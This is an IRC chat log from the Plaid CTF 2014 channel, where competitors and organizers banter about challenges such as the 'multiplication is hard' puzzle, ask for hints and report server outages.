[00:27] <anyny0> x)
[00:27] == wahwah [~wahwah@ctf.inso.tuwien.ac.at] has joined #pctf
[00:27] <tokki> shet
[00:28] <+mserrano> yay dcua
[00:28] <+mserrano> 4 solves
[00:28] <tokki> i cant believe im stuck in misc 10
[00:28] <+mserrano> misc 10 is a quality problem
[00:28] == vooX [4e81ae54@gateway/web/freenode/ip.78.129.174.84] has joined #pctf
[00:28] <tokki> hmm..
[00:28] == melanie [~melanie@acta.techinc.nl] has quit []
[00:28] <corpille> 38.55 * 1700 mmhh ...
[00:28] <asmoday> yeah not what you think
[00:28] <+cai_> it's hard
[00:29] <+tylerni7> yeah man
[00:29] <+cai_> not everyone can do that correctly
[00:29] <+tylerni7> multiplication is hard
[00:29] <tokki> D:
[00:29] <tokki> D::
[00:29] == be [ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd] has left #pctf []
[00:29] <asmoday> google is not your fiend
[00:29] == be [ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd] has joined #pctf
[00:29] <asmoday> friend
[00:29] <tokki> D:::::
[00:29] <tokki> how did people solve dis
[00:29] <vooX> damn, web300 is more easier than web200..
[00:30] subsnake pings tylerni7 pm
[00:31] tokki hurls trout
[00:31] <bobsteam> is it vooX ?
[00:31] <vooX> yup, at least the kpop one
[00:31] <vooX> which i'm still fighting with
[00:32] <+mserrano> bubble bubble pop pop
[00:32] <bobsteam> ah, I haven't started kpop yet
[00:32] <tokki> kpop is the best
[00:32] <bobsteam> I'm too busy hating memes and cats
[00:32] <+cai_> man we are gonna hit 10K submissions soon >:-)
[00:33] <+tylerni7> lol
[00:33] <rray> web300 is frustrating ;_;
[00:33] == player10 [~root@vps-8685-0281.cloud.tilaa.com] has quit [Ping timeout: 276 seconds]
[00:33] <tokki> lol
[00:33] <vooX> not as furstrating as songs-web
[00:34] <+tylerni7> forensics 250 is cool :)
[00:34] <+cai_> forensics opened
[00:34] == knc [6a4cc70d@gateway/web/freenode/ip.106.76.199.13] has quit []
[00:34] <+tylerni7> good challenge to open up :)
[00:34] <+mserrano> CURLCORRRRRRRRRRRRRRRRRRE
[00:34] <tokki> CURLLLLLLL
[00:34] == paraxor [~aoepxnpe@unaffiliated/prazial] has left #pctf []
[00:35] == frozencemetery [~frozencem@pool-71-174-94-227.bstnma.fios.verizon.net] has quit [Ping timeout: 250 seconds]
[00:35] == naam [~naam@83.141.77.130] has quit [Ping timeout: 276 seconds]
[00:36] == lfogel [~lafogel@salisbury-71-252.dyn.wpi.edu] has quit [Ping timeout: 276 seconds]
[00:36] == rev1550 [~lorenza@74.123.248.143] has quit [Quit: Leaving.]
[00:38] <marcan> man, paris took way too long.
[00:38] <marcan> but that was cute.
[00:38] <+cai_> grats :)
[00:39] == obriencd [969cdb9b@gateway/web/freenode/ip.150.156.219.155] has joined #pctf
[00:39] <dracu> i don't get the flag for misc10 - i mean i got it, but i don't get it, u know ? :D
[00:39] <obriencd> i didnt get it so i really dont get it
[00:39] <+cai_> if you got the flag, it would have accepted and gave you points!
[00:39] <anyny0> The number's important but have so many flag possibilites D=
[00:40] == mascot [~user@ec2-23-20-163-234.compute-1.amazonaws.com] has quit [Quit: Leaving.]
[00:40] <dracu> i actually got the flag
[00:40] <dracu> and the points :)
[00:40] == mouth`1 [~mouth@5.45.180.209] has joined #pctf
[00:40] <+cai_> ah
[00:40] <dracu> but why was that the flag ?
[00:40] == pouete [~pouete@unaffiliated/pouete] has joined #pctf
[00:40] == p45741 [~Robin@5.45.180.209] has joined #pctf
[00:40] <+cai_> the process of getting that flag should've let you know?
[00:41] <dracu> yes
[00:41] == krycek1 [~krycek@5.45.180.209] has joined #pctf
[00:41] <+cai_> then you understand why it is what it is :p
[00:42] <dracu> yeah... i was just amazed that it said "success"... (wtf?!)
[00:42] == p4574 [~Robin@5.45.180.209] has quit [Ping timeout: 252 seconds]
[00:42] <+cai_> :)
[00:42] <dracu> fun, but hard ctf 4 n00bs
[00:42] == frozencemetery [~frozencem@pool-71-174-94-227.bstnma.fios.verizon.net] has joined #pctf
[00:42] == mode/#pctf [+v frozencemetery] by ChanServ
[00:42] == mouth` [~mouth@5.45.180.209] has quit [Ping timeout: 252 seconds]
[00:42] == krycek [~krycek@5.45.180.209] has quit [Ping timeout: 252 seconds]
[00:42] <asmoday> if this is rfc i will be very upset
[00:43] == hammerpig [~user@gateway/tor-sasl/hammerpig] has quit [Ping timeout: 272 seconds]
[00:43] == kanghee [~kanghee@143.248.193.69] has quit [Remote host closed the connection]
[00:43] <+cai_> yay over 10K submission \o/
[00:43] <+houqp> \o/
[00:43] == bloup_ [95acea33@gateway/web/freenode/ip.149.172.234.51] has quit [Quit: Page closed]
[00:44] <tokki> lol
[00:45] == hammerpig [~user@gateway/tor-sasl/hammerpig] has joined #pctf
[00:45] <vooX> damn, the last stage of thes web-songs makes me crazy... :(
[00:46] == obriencd [969cdb9b@gateway/web/freenode/ip.150.156.219.155] has quit [Ping timeout: 240 seconds]
[00:47] == talanor [~talanor@91.224.149.24] has joined #pctf
[00:49] == naam [~naam@83.141.77.130] has joined #pctf
[00:49] <NK_> tylerni7: i feel like there is a disturbance in the force
[00:49] <NK_> the gameboard say our last submission was a day ago
[00:49] <+cai_> NK_: refresh?
[00:50] <NK_> same
[00:50] <+cai_> hmm
[00:50] == garganoth [~Alex@107.171.213.109] has left #pctf []
[00:50] <+cai_> cache flush refresh?
[00:50] <NK_> the scoreboard say 15 min though
[00:50] == mad0na [~subsnake@91.148.120.210] has joined #pctf
[00:51] <+cai_> yeah, don't worry about it.. it's just there more for the styles/quick info, but things are correct in db
[00:51] <NK_> hm cache flush refresh say the same
[00:51] == lstamour_ [~lstamour@beitshlomo.com] has joined #pctf
[00:51] <+cai_> weird :/
[00:51] <NK_> yep
[00:51] <NK_> let's see on another browser just in case
[00:51] <vooX> btw, this year, web is pretty hard
[00:51] <NK_> same with another browser
[00:51] <+tylerni7> vooX: I think normally we don't have much web
[00:52] <+tylerni7> people asked for more web and forensics
[00:52] == naam [~naam@83.141.77.130] has quit [Read error: Connection reset by peer]
[00:52] <NK_> yes it's good
[00:52] <+cai_> NK_: strange. it
[00:52] <+cai_> it's probably cache on our side then
[00:52] <+tylerni7> we gave them web and forenics that we thought were fun :)
[00:52] <+cai_> but yeah, i wouldn't worry about it
[00:52] <NK_> too much exploit / reverse in the past years
[00:52] <+cai_> thanks for letting us know tho
[00:52] <+tylerni7> NK_: :/
[00:52] <+tylerni7> we have more of those challenges too, they just aren't opened yet :P
[00:52] <NK_> tylerni7: i know not everyone aggree with this :p
[00:53] <mrsmith67> can anyone help me with multipliation?
[00:53] <mrsmith67> i know it has to do with time...
[00:53] <+tylerni7> mrsmith67: multiplication is hard
[00:53] <+tylerni7> you should have a computer do it
[00:53] <NK_> addition, multiplication and division is hard
[00:53] <NK_> according to the past years
[00:54] <+cai_> math is hard
[00:54] == lfogel [~lafogel@salisbury-71-252.dyn.wpi.edu] has joined #pctf
[00:55] == DeadheadTn [~xtr4@197.0.88.130] has joined #pctf
[00:55] <pouete> as a question : on __nightmares__ have really nothing to do with pyjail ?
[00:55] <+cai_> NK_: you can guess what will be on next year :)
[00:55] == psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has joined #pctf
[00:55] == Apple_Eater [~Apple_Eat@mail.appleeater.com] has joined #pctf
[00:56] == mouth`1 [~mouth@5.45.180.209] has quit [Quit: Leaving.]
[00:56] <tokki> call you my everything~
[00:56] <pouete> ( just tried to call ().__nighmares__ . was not disapointed O )
[00:56] <tokki> :O
[00:56] == n00bz [~1234@host31-111-dynamic.6-79-r.retail.telecomitalia.it] has joined #pctf
[00:57] == Zoro has changed nick to awrign
[00:57] <tokki> me no getz misc 10
[00:57] <tokki> this is sad
[00:57] <Pitr_> I get it but only after someone explained it to me 8)
[00:57] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
[00:57] == awrign has changed nick to armerichigo
[00:58] == armerichigo has changed nick to americhigo
[00:58] <tokki> hmm
[00:58] <asmoday> ok seriously for curl, is this a DEP or Reverse
[00:58] <+tylerni7> what do you mean DEP?
[00:58] <tokki> DEPRESSION
[00:58] <+tylerni7> anyway, it's forensics
[00:58] <asmoday> sorry dpe, deep packet inspect
[00:58] <dct1> johnny DEP
[00:58] <tokki> LOL
[00:58] <americhigo> that would be dpi
[00:59] == maurer [~maurer@MIMUNG.ECE.CMU.EDU] has joined #pctf
[00:59] == n00b13 [~n00b13@unaffiliated/nitsua] has quit []
[00:59] <asmoday> said the guy who has slept ;p ha
[00:59] == Frisk0 [~Frisk0@128.237.204.61] has quit [Ping timeout: 240 seconds]
[00:59] == bwn3r [~n00b13@pool-173-69-181-134.bltmmd.fios.verizon.net] has joined #pctf
[00:59] == bwn3r [~n00b13@pool-173-69-181-134.bltmmd.fios.verizon.net] has quit [Changing host]
[00:59] == bwn3r [~n00b13@unaffiliated/nitsua] has joined #pctf
[01:00] == americhigo has changed nick to Zoro
[01:01] <Zoro> `-`
[01:01] == psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has quit [Quit: Leaving.]
[01:01] == psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has joined #pctf
[01:01] <asmoday> is it in the tcpdump or the memory
[01:02] <Apple_Eater> I had a question with kpop -- just wanted to see if I am on the right track. Anyone around?
[01:02] <Pitr_> it's DERP
[01:02] <+tylerni7> Apple_Eater: you can pm me
[01:02] <tokki> *gasp*
[01:02] <Apple_Eater> Thanks
[01:02] <tokki> DERP!!!
[01:03] <ShortKidd> tyler, are you ever not here?
[01:03] <tokki> is misc 10 like a nonsense question
[01:03] <asmoday> this damn game had me questioning 65535 how dare you
[01:03] <WhizzMan> urgh, multiplication *is* hard
[01:03] <tokki> like the answer should be like unicorns or something
[01:03] == killobyte [~killobyte@h140.net36.bmstu.ru] has joined #pctf
[01:03] <killobyte> hi, who can i ask about whatscat task?
[01:03] <+tylerni7> killobyte: me
[01:03] <+tylerni7> pm
[01:04] <ShortKidd> the heartbleed one, tokki?
[01:04] <tokki> the multiplication one :p
[01:04] <ShortKidd> oh lol
[01:04] == mode/#pctf [+o cai_] by ChanServ
[01:04] == Frisk0 [~Frisk0@2601:7:9e00:8f:ed6f:4299:1327:d3fe] has joined #pctf
[01:04] <tokki> *gasp* cai is op!
[01:04] == cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $10 added to each cash prizes so far (from CHANCE card)
[01:04] <cybertech> the mutiplication one is not working
[01:04] <tokki> lol
[01:04] <cybertech> i found the answer is wont take it
[01:04] == mode/#pctf [-o cai_] by ChanServ
[01:05] <tokki> lol
[01:05] <subsnake> xD
[01:05] <Pitr_> cybertech, try querying an admin
[01:05] <tokki> xD
[01:05] <cybertech> hmm
[01:05] <cybertech> no admins on here
[01:05] <asmoday> cybertech its not 65535
[01:05] <shadghost> admins are 'voiced' here
[01:05] <cybertech> hmm
[01:05] <tokki> lol
[01:05] <subsnake> nor unicorn
[01:05] <cybertech> i thought that was the answer
[01:05] <tokki> damn!
[01:06] <tokki> i was submitting unicorns!
[01:06] <+cai_> cybertech: it will take it when you have the correct answer
[01:06] <asmoday> think outside that box
[01:06] <cybertech> ok
[01:06] <Yerer> Oh haha
[01:06] <Yerer> I'm surprised that was the answer for misc10
[01:07] <+cai_> :)
[01:07] == Bijan-E [~bijan-e@unaffiliated/bijan-e] has quit [Quit: Leaving]
[01:07] == T1mb0 [~Timbo@05436dde.skybroadband.com] has quit [Quit:  HydraIRC -> http://www.hydrairc.com <- Organize your IRC]
[01:07] == LouTerrailloune [~LouTerrai@home.louterrailloune.com] has quit [Ping timeout: 276 seconds]
[01:07] == shortkidd_ [60279873@gateway/web/freenode/ip.96.39.152.115] has joined #pctf
[01:08] == lstamour_ [~lstamour@beitshlomo.com] has quit [Quit: Lost terminal]
[01:08] <WhizzMan> I can't even see a box
[01:08] == kiwhacks [~kiwhacks@2a01:e35:87ea:8920:6a5d:43ff:fe86:f128] has joined #pctf
[01:08] <asmoday> You will punch yourself after knowing the answer
[01:09] <WhizzMan> oh I'm sure I will
[01:09] <asmoday> like really hard
[01:09] <NK_> :)
[01:09] <tokki> D:
[01:09] <asmoday> I will kick a baby, luckily none are near me ever, after I get the answer to a few of these
[01:10] <asmoday> Dramatic over thinking happens at defcon every year
[01:10] <tokki> D:
[01:10] <WhizzMan> puppies and kittens will be good supplicants
[01:10] <pouete> I would like to know if i am on the right track, should i ask my question on the public chan ?
[01:10] == lfogel [~lafogel@salisbury-71-252.dyn.wpi.edu] has quit [Ping timeout: 240 seconds]
[01:10] <+tylerni7> pouete: pm me
[01:10] <+tylerni7> may not be able to answer
[01:10] <+tylerni7> but yeah
[01:11] <tokki> THE PLAGUEEEEEE
[01:11] == naam [~naam@83.141.77.130] has joined #pctf
[01:11] == ShortKidd [60279873@gateway/web/freenode/ip.96.39.152.115] has quit [Ping timeout: 240 seconds]
[01:11] == shortkidd_ has changed nick to ShortKidd
[01:11] <WhizzMan> Yersinia
[01:12] tokki depresses over the scoreboard
[01:13] <Gynvael> agreed
[01:13] <ShortKidd> let's be depressed together
[01:13] <Gynvael> eb huh
[01:14] <+tylerni7> Gynvael: you guys got time :)
[01:14] <+tylerni7> btw which of you solved rsa?
[01:14] <Gynvael> adam_i
[01:14] <+cai_> Nice
[01:14] <+tylerni7> ooo curlcore solve
[01:14] <+tylerni7> nice
[01:14] <+cai_> 0xffa
[01:15] <+cai_> the vote begins :)
[01:15] <tokki> *gasp*
[01:15] <poppopret> anyone wanna push me in the right direction for web150? =/
[01:15] == poppopret [~poppopret@130.65.0.2] has quit [Remote host closed the connection]
[01:15] <Gynvael> yeah
[01:15] == plaintext [~dada@bl4-157-214.dsl.telepac.pt] has quit [Ping timeout: 252 seconds]
[01:15] == poppopret [~poppopret@130.65.0.2] has joined #pctf
[01:15] <Gynvael> protip for web150: staying on IRC after asking question ftw
[01:15] <tokki> MUST VOTEZ 1
[01:15] <+tylerni7> heh
[01:15] <shadghost> lol
[01:15] <asmoday> FUCK wanted the be the first curlcore
[01:15] <poppopret> lol it crashed
[01:16] <poppopret> back
[01:16] <tokki> that's sad
[01:16] <+tylerni7> poppopret: pm me I guess
[01:16] <iZsh> i got curlcore \o/ :)
[01:16] <tokki> poppopret:  our team member has a similar nickname, haha
[01:16] <tokki> congrats xD
[01:16] <bool_101> grats
[01:17] == lstamour_ [~lstamour@beitshlomo.com] has joined #pctf
[01:17] <iZsh> reaching 48h without sleep in a few hours, meh
[01:17] == plaintext [~dada@81.193.141.235] has joined #pctf
[01:17] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
[01:18] == dedede [d4293493@gateway/web/freenode/ip.212.41.52.147] has joined #pctf
[01:18] <kiwhacks> what is the format of misc10 multiplication response ?
[01:18] == [ToH]bp [~bp__@131.175.28.197] has joined #pctf
[01:18] <+cai_> kiwhacks: number
[01:18] <+cai_> int
[01:18] <Zoro> ZOMBIE
[01:18] <+tylerni7> \d+
[01:18] <kiwhacks> ok thanks
[01:18] <subsnake> NUMBER?
[01:18] <subsnake> !
[01:19] <+tylerni7> ?
[01:19] <+cai_> i mean, you are multipyling two numbers, what did you expect :p
[01:19] <[ToH]bp> 42
[01:19] <subsnake> unicorn works just fine
[01:19] <Zoro> that's not how it works
[01:19] <tokki> guys if there are like no hints till the end of the ctf, wat happens :O
[01:19] <Adran> not invalid flag? :P
[01:20] <WhizzMan> "unknown flag"
[01:20] <Adran> the same thing happens whether there are hints or no hints, the winner(s) win :>
[01:20] <tokki> this misc should at least be 100 points
[01:20] <+tylerni7> well, keep in mind that multiplication is hard
[01:20] <tokki> ^true
[01:20] <WhizzMan> What, no recount?
[01:20] <Adran> and everyone learns something.
[01:20] <iZsh> tokki: problem with hints is that it kills the scoreboard :)
[01:20] <+tylerni7> WhizzMan: multiplication is hard, man
[01:20] <tokki> :D
[01:20] <WhizzMan> yeah, it is
[01:20] <tokki> tylerni7: it is this prob is killing our team
[01:21] == funtimes [~user@c-68-49-76-217.hsd1.md.comcast.net] has quit [Ping timeout: 246 seconds]
[01:21] <+tylerni7> maybe you should do another problem then :)
[01:21] <WhizzMan> tokki: pics!
[01:21] <Yerer> tokki: Try multiplying them
[01:21] == naam [~naam@83.141.77.130] has quit [Ping timeout: 240 seconds]
[01:21] <tokki> lol
[01:21] == zTrix [~zTrix@tu132196.ip.tsinghua.edu.cn] has quit [Ping timeout: 250 seconds]
[01:21] <tokki> hmm
[01:22] <hellman> open pls more crypto (and other tasks) until morning :)
[01:22] <Luffy> uh
[01:22] == [pwn]tayacan [~tayacan@wireless-conference.science.ku.dk] has quit [Quit: Leaving]
[01:22] <Luffy> is multiplication is hard broken
[01:22] <+tylerni7> Luffy: no
[01:22] <NK_> oh
[01:22] <Luffy> cuz im sure i multiplied them correctly
[01:22] <+cai_> Luffy: it's working fine :)
[01:22] <NK_> nooo
[01:22] <WhizzMan> Luffy: it's hard, that's why
[01:22] <NK_> this curl is linked to openssl1.0.1e
[01:22] <Luffy> i feel you guys snickering
[01:22] <+cai_> well, it's hard, so some people couldn't
[01:23] == Stean [~Stean@95-88-74-196-dynip.superkabel.de] has joined #pctf
[01:23] == haoz [b44ac723@gateway/web/freenode/ip.180.74.199.35] has joined #pctf
[01:24] <haoz> a
[01:24] == wolfpack [9807491f@gateway/web/freenode/ip.152.7.73.31] has joined #pctf
[01:24] <tokki> D:
[01:24] <ShortKidd> b
[01:24] <haoz> multiplication is hard ?
[01:24] <Zoro> That's what Misc 10 feels like
[01:25] <tokki> multiplication is hard.
[01:25] <Adran> error: cannot divide by zero
[01:25] <whos_tyler> Zoro: I dont get the joke
[01:25] <Zoro> have you done misc 10 yet?
[01:25] <whos_tyler> I have
[01:26] <whos_tyler> still dont get it
[01:26] <haoz> i dun get the flag :p
[01:26] == livinded [~livinded@108-84-156-71.lightspeed.sntcca.sbcglobal.net] has joined #pctf
[01:26] <duckyTS> misc10 is probably something stupid
[01:26] == [pwn]Idolf [~idolf@fw-alt2.math.ku.dk] has quit [Ping timeout: 258 seconds]
[01:26] <nullProtectorate> loł
[01:26] <tokki> lol
[01:26] <livinded> 101
[01:26] <asmoday> some middleschooler is laughing
[01:27] <tokki> i love how people are like, I solved it but i dont get it
[01:27] <nullProtectorate> łøł
[01:27] == vooX [4e81ae54@gateway/web/freenode/ip.78.129.174.84] has quit [Quit: Page closed]
[01:28] <haoz> mind to give some hints ? :p
[01:28] <kmowery> proofs of work :|
[01:28] <WhizzMan> for a 10 pt challenge? pfff
[01:28] <haoz> :X
[01:28] <WhizzMan> I'm not getting it either, but come on, it's a 10 point challenge
[01:29] <anyny0> Lol
[01:29] == mouth` [~mouth@5.45.180.209] has joined #pctf
[01:29] <x_x> This 10 point challenge is mocking me.
[01:29] <WhizzMan> yes :)
[01:29] <x_x> Much like my Calculus III grade.
[01:29] <x_x> Y_Y
[01:29] <WhizzMan> you and plenty of other people
[01:29] <Luffy> um
[01:29] <Luffy> is back and time a typo
[01:29] <Luffy> did you guyes mean back in time
[01:29] <x_x> Nope, it's a hint.
[01:30] <Luffy> it is?
[01:30] == lfogel [~lafogel@salisbury-71-252.dyn.wpi.edu] has joined #pctf
[01:30] <x_x> Maybe?
[01:30] <+tylerni7> Luffy: that's a typo
[01:30] <+tylerni7> :P
[01:30] <Luffy> oh
[01:30] x_x sniffles.
[01:30] <x_x> I hoped it was a hint.
[01:30] <Luffy> youre dumb
[01:30] <+tylerni7> Luffy: which problem?
[01:30] <Luffy> go away
[01:30] == be [ac17cef9ca@gateway/web/cgi-irc/kiwiirc.com/x-krbszdhddwaqbbzd] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[01:30] <Luffy> was talking about multiplication is hard
[01:30] <x_x> Multiplication is hard.
[01:31] <+tylerni7> there, it should say "back in time" now
[01:31] <shadghost> 1*1=1 , see i can multiply
[01:31] <Adran> man its like a chant
[01:31] <+cai_> voting ends in 12
[01:32] <tokki> ooh
[01:32] <namrog84> the flag isn't a number is it
[01:32] <tokki> they've told me it is an 'int' form
[01:32] <tokki> but are you guys sure
[01:32] <+cai_> namrog84: it is, for multiplication is hard problem
[01:32] <WhizzMan> so no flag{12324} but just 12324 ?
[01:33] <bwn3r> can anyone help me with 150 ? :'(
[01:33] <bwn3r> web
[01:33] == _ariel [~root@93.154.251.21] has joined #pctf
[01:33] tokki goes to corner, checks calculator and cries
[01:34] <Pitr_> May I complo
[01:34] <+cai_> WhizzMan: yeah, you shouldn't see flag{}.
[01:34] == jablonskim [~jablonski@178235254045.warszawa.vectranet.pl] has joined #pctf
[01:34] <Pitr_> May I compliment the creator of misc10 :D
[01:34] <sqall> much time consuming
[01:34] <sqall> such depression
[01:34] <sqall> very unwow :/
[01:34] <kurtisebear> its making me want to kill myself Im sure I need to think out the box a little but its been annoying me for like 30 mins now
[01:34] <WhizzMan> no amaze
[01:34] <tokki> ikr
[01:35] <x_x> It's both funny, and sad.
[01:35] == hkr` [~hkr@unaffiliated/hkr/x-6459160] has joined #pctf
[01:35] == LMolr [89ccb77e@gateway/web/freenode/ip.137.204.183.126] has joined #pctf
[01:36] <n00bz> lol voox
[01:36] == ggis [~ggis@fw-alt2.math.ku.dk] has quit [Ping timeout: 245 seconds]
[01:36] <LMolr> hints for tenement ??
[01:36] == jakemask [~anonymous@128.54.36.237] has joined #pctf
[01:36] <LMolr> i am trying hard
[01:36] <LMolr> plz admi
[01:36] <_ariel> hey guys, i have a problem with reverse 250 (hudak), i have found a key (without patching an app), i get congratz and that's all?
[01:37] == j0e__ [~The@174-22-95-184.sxfl.qwest.net] has quit [Ping timeout: 250 seconds]
[01:37] <+cai_> _ariel: you can pm me the key you found
[01:37] <WhizzMan> you want a medal?
[01:37] <n00bz> any help for web300?
[01:37] <tokki> a gold medal!
[01:38] == wahwah [~wahwah@ctf.inso.tuwien.ac.at] has quit [Ping timeout: 245 seconds]
[01:39] <+cai_> 4 minutes left for voting
[01:39] == gpp [~gpp@d14-69-215-126.try.wideopenwest.com] has joined #pctf
[01:40] <kurtisebear> and finaly got misc10
[01:41] <mak> To confirm, for reekee you need code execution to be able to find the flag, right?
[01:42] == InternalCumBustI [43a49c58@gateway/web/cgi-irc/kiwiirc.com/ip.67.164.156.88] has quit [Quit: http://www.kiwiirc.com/ - A hand crafted IRC client]
[01:42] <Hertz_> right mak
[01:43] == Ph4te [~phate@ctfgate.sec.in.tum.de] has quit [Remote host closed the connection]

[01:43] == ShortKidd [60279873@gateway/web/freenode/ip.96.39.152.115] has quit [Ping timeout
[01:43] == T1mb0 [~Timbo@05436dde.skybroadband.com] has joined #pctf
[01:44] == Ph4te [~phate@ctfgate.sec.in.tum.de] has joined #pctf
[01:44] <Phshap> damn
[01:44] <+cai_##### CHANCE Card: $10 added to the pot again
[01:44] <+cai_> no hints :'(
[01:44] <Phshap> :)
[01:44] <Phshap> i mean :(
[01:44] == mode/#pctf [+o cai_] by ChanServ
[01:44] <Phshap> very L(
[01:44] <x_x> booo money
[01:44] == mad0na [~subsnake@91.148.120.210] has quit [Quit: Lost terminal]
[01:44] <Phshap> who needs money
[01:44] == cai_ changed the topic of #pctf to: [Plaid CTF 2014 - play.plaidctf.com] 24 Hours left | $20 added to each cash prizes so far (from CHANCE card)
[01:45] == mode/#pctf [-o cai_] by ChanServ
[01:48] <Pitr_> Chance should have a 'valuta change to BTC' card
[01:48] <[ToH]bp> dogecoin or bust
[01:48] <WhizzMan> to the moon
[01:48] <WhizzMan> Pitr_: 'currency change to MTGOX BTC'
[01:49] <+cai_> web is opened
[01:49] <bobsteam> question on reekee >.>
[01:49] <iago-x86> Hey, can I ask somebody a question about whatscat?
[01:49] <+tylerni7> iago-x86: sure
[01:49] <+tylerni7> I just refreshed the db
[01:50] <_blasty_> is new web supposed to give 500 err ?
[01:50] <+tylerni7> _blasty_: ... probably not h/o
[01:50] <halfvollemelk> multiplication is hard...
[01:50] <grimmlin_> crash double free:
[01:50] <mongo12> five double oh!!
[01:50] <grimmlin_> arf, wrong window
[01:50] <Adran> is halphow2js supposed to be giving 500?
[01:50] <+tylerni7> h/o
[01:50] <mongo12> call the nine one one
[01:50] <tokki> am I still online?
[01:50] <_blasty_> internet pwn-lice
[01:51] <jduck> q/uit 502 Bad Gateway
[01:51] <jduck> oops
[01:51] <tokki> lol
[01:51] <shadghost> Burp proxy error: Failed to connect to 54.196.246.17:8001
[01:51] <mischa__> halphow2js down?
[01:52] == trelgak [~trelgak@130.65.0.2] has joined #pctf
[01:52] <namrog84> 65
[01:53] <+tylerni7> ok
[01:53] == cybertech [4432fdee@gateway/web/freenode/ip.68.50.253.238] has quit [Ping timeout: 240 seconds]
[01:53] == shortkidd [60279873@gateway/web/freenode/ip.96.39.152.115] has joined #pctf
[01:53] <+tylerni7> HALPHOW2JS IS RUNNING NOW
[01:53] <acez> who can I ping for kappa
[01:53] <Im11Plus> Web 200 easy
[01:53] <Im11Plus> Gives you flag, such wow
[01:53] <haoz> multiplication is hard...
[01:53] <namrog84> multiplication is hard...
[01:53] <anyny0> Indeed
[01:54] <namrog84> just stick it in calculator, made easy!
[01:54] <tokki> D:...
[01:54] <tokki> its hard..
[01:54] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has quit [Remote host closed the connection]
[01:54] <haoz> something wrong with my calculator ? :(
[01:54] == asdfasdfasdfasdf [4738ed75@gateway/web/freenode/ip.71.56.237.117] has joined #pctf
[01:54] <namrog84> probably
[01:55] <namrog84> do you have CTF mode enabled?
[01:55] <tokki> lol
[01:55] <haoz> lolll....
[01:55] <x_x> The batteries on my TI died. Cannae enter it into CTF mode.
[01:55] == nullProtectorate [~nullProte@pool-71-191-221-210.washdc.fios.verizon.net] has joined #pctf
[01:55] <tokki> TI's eat a lot of batteries
[01:55] <x_x> They really do.
[01:55] == Zoro has changed nick to aobugw4uob49tt34
[01:55] <tokki> and they are goddamn expensive, heavy,
[01:56] <halfvollemelk> I'm sure I multiplied it correctly...
[01:56] <tokki> and yet my scholl makes us buy them..
[01:56] == aobugw4uob49tt34 has changed nick to Zoro
[01:56] <trelgak> can anyone push me in the right direction for reversing200? been working on it for forever..
[01:56] == wahwah [~wahwah@ctf.inso.tuwien.ac.at] has joined #pctf
[01:57] <x_x> I want one of those newer CAS models. They have fancy pants 3D graphing.
[01:57] <Im11Plus> lul web 200 end.response
[01:57] <tokki> x_x: rly?! oh god technology
[01:58] <x_x> Delicious technology
[01:58] <shortkidd> reverse it, trel
[01:58] == Stean [~Stean@95-88-74-196-dynip.superkabel.de] has quit [Quit: Leaving.]
[01:58] <x_x> Refresh a few times.
[01:58] <x_x> It'll get there eventually.
[01:58] == fritz[] [~unk@93-138-136-136.adsl.net.t-com.hr] has joined #pctf
[01:58] == poppopret [~poppopret@130.65.0.2] has quit [Remote host closed the connection]
[01:59] <trelgak> can anyone help me answer a question i have about reversing 200?
[02:00] <WhizzMan> Heh, multiplication is hard is funnier than you'd think, especially if you know why the answer is what it is
[02:00] <Luffy> ya
[02:00] <Luffy> its funny :)
[02:00] <+cai_> WhizzMan: :
[02:00] <+cai_> :)*
[02:00] <+tylerni7> trelgak: perhaps
[02:01] <x_x> This is just getting cruel.
[02:01] <+tylerni7> you can pm
[02:01] <x_x> Like every math professor I've ever had.
[02:01] <x_x> >_>
[02:01] <haoz> :|
[02:01] <halfvollemelk> jo, wtf is this sorcery
[02:02] <halfvollemelk> suddenly I check my scoreboard and multiplication is solved
[02:02] <Adran> suddenly math is hard
[02:02] <halfvollemelk> suddenly i'm even more confused
[02:02] == deject3d [~deject3d@205.204.16.45] has joined #pctf
[02:02] <[ToH]bp> Infinity - object > []?
[02:02] <tokki> D:....
[02:03] <tokki> i still dont get the multiplication is hard
[02:03] <tokki> its hard
[02:03] <LMolr> i dont get crypto 20
[02:03] <LMolr> :/
[02:03] <tokki> :/
[02:03] == eZpl0it [~ezpl0it@x2f444fa.dyn.telefonica.de] has quit [Ping timeout: 252 seconds]
[02:03] <WhizzMan> halfvollemelk: playing with more people on your team?
[02:03] <tokki> lol
[02:03] <haoz> my mathssss....
[02:04] <LMolr> maybe i am """special"""
[02:04] == nodoc [~nodoc@host-252-206-107-208.midco.net] has joined #pctf
[02:04] == psaikonet1 [~psaikonet@cpe-72-179-33-155.austin.res.rr.com] has quit [Quit: Leaving.]
[02:05] <Adran> computers are hard, time to pack my bags
[02:07] <deject3d> crypto 20 is one of the simplest ciphers
[02:07] <tokki> wat
[02:07] <tokki> wat?!
[02:07] <tokki> wat?!?!?
[02:07] <Lopi> who can I pm with a question regarding a challenge?
[02:07] <Adran> it was pretty easy
[02:07] <+tylerni7> Lopi: me
[02:08] <kiwhacks> misc10 makes me crazy...
[02:08] <tokki> lol ya
[02:08] <namrog84> ditto
[02:09] <Luffy> nah
[02:09] <Luffy> theyre pretty easy
[02:09] <Luffy> just gotta think outside the box
[02:09] <namrog84> im so far outside the box, i dont even know where the box was
[02:09] <livinded> is reekee getting hammered?
[02:09] <Adran> I've stretched out the box so much its now a circle
[02:10] <deject3d> reekee sux
[02:10] == ggis [~ggis@0x3ec6eb67.inet.dsl.telianet.dk] has joined #pctf
[02:10] == naam [~naam@83.141.77.130] has joined #pctf
[02:10] == nofiki1 [~Adium@207.98.148.16] has joined #pctf
[02:10] == nofiki1 [~Adium@207.98.148.16] has quit [Client Quit]
[02:10] == mascot [~user@ec2-23-20-163-234.compute-1.amazonaws.com] has joined #pctf
[02:11] <namrog84> 38.55 * 1700
[02:11] <namrog84> oops
